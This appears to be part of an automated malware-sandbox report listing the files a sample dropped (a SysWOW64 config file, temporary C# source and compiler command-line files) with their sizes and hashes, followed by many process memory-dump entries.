c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe.config

Filesize
357B

MD5
a2b76cea3a59fa9af5ea21ff68139c98

SHA1
35d76475e6a54c168f536e30206578babff58274

SHA256
f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

SHA512
b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBB03.tmp

Filesize
676B

MD5
bb766fd83728852869147f7c5698030b

SHA1
834e962fae8f3a2d6c3ae255ebac5f69b7e416c1

SHA256
360941ea7b48b4224640122050fa312e695a8d31afa200ecb978d1246e656a3d

SHA512
bed1a32aa2c6047cb37ddff606ffac3b2636cd72fc58878e899e396ffd7d85309bc48113a572ecc5734c71e3ffb7c655f9ec77be278c0c2fe82429486caf9e84

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\olkn7wjw.0.cs

Filesize
208KB

MD5
e086c1f52bc9847b2b46a1647e50dc54

SHA1
b150f0c7b63f99d9f6ca63c529c5c60f42081bfc

SHA256
a0504c1bbcc123feeb145d01b1f6967a3f54b546d9a5f51c194c2c5a3ba802b9

SHA512
8203a10de6b34c6fdd0e12bea6af13e712ff5bb07b0bb80caf226f5e13bf3c35c22f4f298f103b615fce01872bb6a3c7bd0d439419bbf2dc778cc3627cdcfc24

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\olkn7wjw.cmdline

Filesize
349B

MD5
a46f8d015bd1211cf0a524e7e7d77695

SHA1
cf9cb3f7f7f105653e83832ef65296b51ee34823

SHA256
ac468992d1ac3ad14312102e6e19c39f76ac995c53fac71415d150a4a80d227f

SHA512
53f7be2f2251f71f6acbd0d05e649f65f1488bd776abb1923daa3fa78123379f23ec760f4f37cfb9ecec4061ce4f9f81a939e795ec57b191fa87960820dc4c2c

Download Submit
memory/1188-173-0x0000000000A40000-0x0000000000A50000-memory.dmp

Filesize
64KB

Download
memory/1772-313-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/1772-314-0x000000001BFA0000-0x000000001BFB0000-memory.dmp

Filesize
64KB

Download
memory/1872-327-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-325-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-326-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-318-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-328-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-317-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-329-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-330-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-331-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-332-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-321-0x0000000002AF0000-0x0000000002B04000-memory.dmp

Filesize
80KB

Download
memory/1872-333-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/1872-320-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2540-275-0x000000001D420000-0x000000001D432000-memory.dmp

Filesize
72KB

Download
memory/2540-322-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/2540-266-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/2540-316-0x000000001D4E0000-0x000000001D4EE000-memory.dmp

Filesize
56KB

Download
memory/2720-67-0x0000016BFADE0000-0x0000016BFADF0000-memory.dmp

Filesize
64KB

Download
memory/2720-194-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/2720-46-0x0000016BF8FA0000-0x0000016BF8FEA000-memory.dmp

Filesize
296KB

Download
memory/2720-52-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/2820-289-0x0000000000320000-0x0000000000328000-memory.dmp

Filesize
32KB

Download
memory/2820-290-0x0000000074B10000-0x00000000752C0000-memory.dmp

Filesize
7.7MB

Download
memory/2820-294-0x0000000074B10000-0x00000000752C0000-memory.dmp

Filesize
7.7MB

Download
memory/2824-261-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/2824-255-0x0000000000870000-0x0000000000876000-memory.dmp

Filesize
24KB

Download
memory/2824-262-0x0000000001680000-0x0000000001690000-memory.dmp

Filesize
64KB

Download
memory/2824-297-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/3512-221-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/3512-213-0x00000000001B0000-0x00000000001BC000-memory.dmp

Filesize
48KB

Download
memory/3512-217-0x000000001ACA0000-0x000000001ACDC000-memory.dmp

Filesize
240KB

Download
memory/3512-216-0x000000001AC40000-0x000000001AC52000-memory.dmp

Filesize
72KB

Download
memory/3512-215-0x000000001ADD0000-0x000000001ADE0000-memory.dmp

Filesize
64KB

Download
memory/3512-214-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/3516-181-0x000000001C680000-0x000000001C696000-memory.dmp

Filesize
88KB

Download
memory/3516-189-0x000000001DB80000-0x000000001DC70000-memory.dmp

Filesize
960KB

Download
memory/3516-260-0x00007FFE07CA0000-0x00007FFE08641000-memory.dmp

Filesize
9.6MB

Download
memory/3516-224-0x00007FFE07CA0000-0x00007FFE08641000-memory.dmp

Filesize
9.6MB

Download
memory/3516-225-0x0000000000DA0000-0x0000000000DB0000-memory.dmp

Filesize
64KB

Download
memory/3516-192-0x000000001DC80000-0x000000001DCC9000-memory.dmp

Filesize
292KB

Download
memory/3516-190-0x000000001CDC0000-0x000000001CDDE000-memory.dmp

Filesize
120KB

Download
memory/3516-31-0x000000001C1B0000-0x000000001C24C000-memory.dmp

Filesize
624KB

Download
memory/3516-33-0x00007FFE07CA0000-0x00007FFE08641000-memory.dmp

Filesize
9.6MB

Download
memory/3516-23-0x000000001BC40000-0x000000001C10E000-memory.dmp

Filesize
4.8MB

Download
memory/3516-22-0x0000000000DA0000-0x0000000000DB0000-memory.dmp

Filesize
64KB

Download
memory/3516-183-0x000000001B4C0000-0x000000001B4D2000-memory.dmp

Filesize
72KB

Download
memory/3516-199-0x000000001E030000-0x000000001E050000-memory.dmp

Filesize
128KB

Download
memory/3516-188-0x000000001D5C0000-0x000000001DB7A000-memory.dmp

Filesize
5.7MB

Download
memory/3516-195-0x0000000000DA0000-0x0000000000DB0000-memory.dmp

Filesize
64KB

Download
memory/3516-21-0x00007FFE07CA0000-0x00007FFE08641000-memory.dmp

Filesize
9.6MB

Download
memory/3516-187-0x000000001CC60000-0x000000001CCC2000-memory.dmp

Filesize
392KB

Download
memory/3516-196-0x000000001DD60000-0x000000001DDD0000-memory.dmp

Filesize
448KB

Download
memory/3516-12-0x000000001B570000-0x000000001B5CC000-memory.dmp

Filesize
368KB

Download
memory/3516-18-0x000000001B750000-0x000000001B75E000-memory.dmp

Filesize
56KB

Download
memory/3516-197-0x0000000000DA0000-0x0000000000DB0000-memory.dmp

Filesize
64KB

Download
memory/3516-185-0x000000001B560000-0x000000001B568000-memory.dmp

Filesize
32KB

Download
memory/3516-184-0x000000001B440000-0x000000001B448000-memory.dmp

Filesize
32KB

Download
memory/3608-271-0x000000001CF10000-0x000000001CF28000-memory.dmp

Filesize
96KB

Download
memory/3608-259-0x0000000000D60000-0x0000000000E4E000-memory.dmp

Filesize
952KB

Download
memory/3608-274-0x000000001BAF0000-0x000000001BB00000-memory.dmp

Filesize
64KB

Download
memory/3608-273-0x000000001BAF0000-0x000000001BB00000-memory.dmp

Filesize
64KB

Download
memory/3608-272-0x000000001BAE0000-0x000000001BAF0000-memory.dmp

Filesize
64KB

Download
memory/3608-270-0x000000001BA90000-0x000000001BADE000-memory.dmp

Filesize
312KB

Download
memory/3608-267-0x0000000003070000-0x0000000003082000-memory.dmp

Filesize
72KB

Download
memory/3608-257-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/3944-296-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/3944-223-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/3944-226-0x00000000016D0000-0x00000000016E0000-memory.dmp

Filesize
64KB

Download
memory/3944-227-0x000000001B040000-0x000000001B14A000-memory.dmp

Filesize
1.0MB

Download
memory/3944-315-0x00000000016D0000-0x00000000016E0000-memory.dmp

Filesize
64KB

Download
memory/4056-295-0x0000000074B10000-0x00000000752C0000-memory.dmp

Filesize
7.7MB

Download
memory/4952-49-0x0000000000850000-0x0000000000A58000-memory.dmp

Filesize
2.0MB

Download
memory/4952-68-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download
memory/4952-265-0x00007FFE05570000-0x00007FFE06031000-memory.dmp

Filesize
10.8MB

Download